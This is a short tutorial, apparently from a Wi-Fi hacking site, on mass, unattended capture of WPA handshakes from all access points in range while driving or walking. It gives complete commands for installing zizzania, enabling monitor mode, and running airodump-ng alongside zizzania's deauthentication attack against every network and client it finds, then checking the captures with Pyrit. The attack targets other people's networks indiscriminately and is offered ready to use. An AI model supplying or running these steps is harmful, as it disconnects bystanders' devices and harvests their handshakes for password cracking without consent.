Mass and endless handshake capture from all Access Points in a range
You can use this method while walking or driving a car with a laptop. The process is completely automated. It does not require your attention at all. Zizzania will perform deauthentication attack against every discovered AP and clients. Airodump-ng will save handshakes.
Zizzania follows channels if another program switch them. Airodump-ng is able to switch channels but does it too fast. So you should adjust -f option (time in ms between hopping channels).
If you do not have zizzania yet, install it:
sudo apt-get install scons libpcap-dev uthash-dev git clone https://github.com/cyrus-and/zizzania.git cd zizzania/ make sudo make install
Shut Network Manager down:
sudo systemctl stop NetworkManager
Put you wireless interface in Monitor mode:
sudo ip link set wlan0 down sudo iw wlan0 set monitor none sudo ip link set wlan0 up
Now you are ready! Open two terminal windows and in the first one type:
sudo airodump-ng wlan0 -f 30000 -w auto1
In the second one issure:
sudo zizzania -i wlan0
Wait for a while (20+ minutes). If you are moving, do not move too fast, the programs need time to work through all channels.
To analyze the capture file you can use Pyrit:
pyrit -r "auto1-02.cap" analyze
- The easiest and fastest ways to hack Wi-Fi (using airgeddon) (100%)
- How to hack Wi-Fi (89.3%)
- Hacking Wi-Fi without users (89.3%)
- Hacking Wi-Fi without users in Aircrack-ng (89.3%)
- WiFi-autopwner: script to automate searching and auditing Wi-Fi networks with weak security (81%)
- Ettercap user manual: man-in-the-middle attack (MitM), password interception, HSTS bypass, data modification on the fly, custom filters and plug-ins usage, BeEF hooks, infection with backdoors (RANDOM - 4.8%)